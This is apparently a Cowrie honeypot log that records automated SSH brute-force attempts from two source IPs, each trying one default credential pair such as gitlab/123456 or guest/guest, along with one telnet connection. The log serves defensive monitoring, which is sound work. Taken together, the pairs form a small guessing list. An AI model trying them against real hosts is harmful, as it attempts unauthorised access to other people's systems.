{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:45:25.877059Z","src_ip":"212.227.235.229","session":"339e11647cdb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:45:26.144066Z","src_ip":"212.227.235.229","session":"339e11647cdb"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T06:45:26.947223Z","src_ip":"212.227.235.229","session":"339e11647cdb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:45:28.216830Z","src_ip":"212.227.235.229","session":"339e11647cdb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34130,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab5351ad3c3a","protocol":"ssh","message":"New connection: 212.227.125.160:34130 (1.2.3.4:22) [session: ab5351ad3c3a]","sensor":"my-vps","timestamp":"2025-08-28T06:45:36.012999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:45:36.014296Z","src_ip":"212.227.125.160","session":"ab5351ad3c3a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:45:36.246129Z","src_ip":"212.227.125.160","session":"ab5351ad3c3a"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:45:36.944215Z","src_ip":"212.227.125.160","session":"ab5351ad3c3a"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:45:38.178692Z","src_ip":"212.227.125.160","session":"ab5351ad3c3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41442,"dst_ip":"1.2.3.4","dst_port":22,"session":"71dea1357d96","protocol":"ssh","message":"New connection: 212.227.235.229:41442 (1.2.3.4:22) [session: 71dea1357d96]","sensor":"my-vps","timestamp":"2025-08-28T06:45:42.571347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:45:42.572190Z","src_ip":"212.227.235.229","session":"71dea1357d96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:45:42.822569Z","src_ip":"212.227.235.229","session":"71dea1357d96"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:45:43.576335Z","src_ip":"212.227.235.229","session":"71dea1357d96"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:45:44.828533Z","src_ip":"212.227.235.229","session":"71dea1357d96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54728,"dst_ip":"1.2.3.4","dst_port":22,"session":"87bacd62ae3a","protocol":"ssh","message":"New connection: 212.227.125.160:54728 (1.2.3.4:22) [session: 87bacd62ae3a]","sensor":"my-vps","timestamp":"2025-08-28T06:45:52.606651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:45:52.607534Z","src_ip":"212.227.125.160","session":"87bacd62ae3a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:45:52.830277Z","src_ip":"212.227.125.160","session":"87bacd62ae3a"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T06:45:53.495041Z","src_ip":"212.227.125.160","session":"87bacd62ae3a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:45:54.715817Z","src_ip":"212.227.125.160","session":"87bacd62ae3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56910,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa8f112b6a88","protocol":"ssh","message":"New connection: 212.227.235.229:56910 (1.2.3.4:22) [session: fa8f112b6a88]","sensor":"my-vps","timestamp":"2025-08-28T06:45:59.186933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:45:59.187824Z","src_ip":"212.227.235.229","session":"fa8f112b6a88"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:45:59.440354Z","src_ip":"212.227.235.229","session":"fa8f112b6a88"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:00.201197Z","src_ip":"212.227.235.229","session":"fa8f112b6a88"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:46:01.454455Z","src_ip":"212.227.235.229","session":"fa8f112b6a88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46832,"dst_ip":"1.2.3.4","dst_port":22,"session":"083e0ea65098","protocol":"ssh","message":"New connection: 212.227.125.160:46832 (1.2.3.4:22) [session: 083e0ea65098]","sensor":"my-vps","timestamp":"2025-08-28T06:46:08.977037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:46:08.983011Z","src_ip":"212.227.125.160","session":"083e0ea65098"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:46:09.196277Z","src_ip":"212.227.125.160","session":"083e0ea65098"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:10.735296Z","src_ip":"212.227.125.160","session":"083e0ea65098"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:46:11.956088Z","src_ip":"212.227.125.160","session":"083e0ea65098"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32776,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae15a086f1b4","protocol":"ssh","message":"New connection: 212.227.235.229:32776 (1.2.3.4:22) [session: ae15a086f1b4]","sensor":"my-vps","timestamp":"2025-08-28T06:46:15.608812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:46:15.610085Z","src_ip":"212.227.235.229","session":"ae15a086f1b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:46:15.864645Z","src_ip":"212.227.235.229","session":"ae15a086f1b4"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:16.631874Z","src_ip":"212.227.235.229","session":"ae15a086f1b4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:46:17.888742Z","src_ip":"212.227.235.229","session":"ae15a086f1b4"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":46114,"dst_ip":"1.2.3.4","dst_port":23,"session":"a4e5240a9272","protocol":"telnet","message":"New connection: 8.222.212.69:46114 (1.2.3.4:23) [session: a4e5240a9272]","sensor":"my-vps","timestamp":"2025-08-28T06:46:19.352467Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35158,"dst_ip":"1.2.3.4","dst_port":22,"session":"e822a57b9211","protocol":"ssh","message":"New connection: 212.227.125.160:35158 (1.2.3.4:22) [session: e822a57b9211]","sensor":"my-vps","timestamp":"2025-08-28T06:46:25.457271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:46:25.472165Z","src_ip":"212.227.125.160","session":"e822a57b9211"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:46:25.672777Z","src_ip":"212.227.125.160","session":"e822a57b9211"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:26.534795Z","src_ip":"212.227.125.160","session":"e822a57b9211"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:46:27.751642Z","src_ip":"212.227.125.160","session":"e822a57b9211"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36654,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c7097a50896","protocol":"ssh","message":"New connection: 212.227.235.229:36654 (1.2.3.4:22) [session: 0c7097a50896]","sensor":"my-vps","timestamp":"2025-08-28T06:46:32.052319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:46:32.053251Z","src_ip":"212.227.235.229","session":"0c7097a50896"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:46:32.300118Z","src_ip":"212.227.235.229","session":"0c7097a50896"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:33.043614Z","src_ip":"212.227.235.229","session":"0c7097a50896"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:46:34.292926Z","src_ip":"212.227.235.229","session":"0c7097a50896"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58094,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb028172d180","protocol":"ssh","message":"New connection: 212.227.125.160:58094 (1.2.3.4:22) [session: eb028172d180]","sensor":"my-vps","timestamp":"2025-08-28T06:46:41.881730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:46:41.888888Z","src_ip":"212.227.125.160","session":"eb028172d180"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:46:42.098034Z","src_ip":"212.227.125.160","session":"eb028172d180"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:42.959037Z","src_ip":"212.227.125.160","session":"eb028172d180"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:46:44.176773Z","src_ip":"212.227.125.160","session":"eb028172d180"}
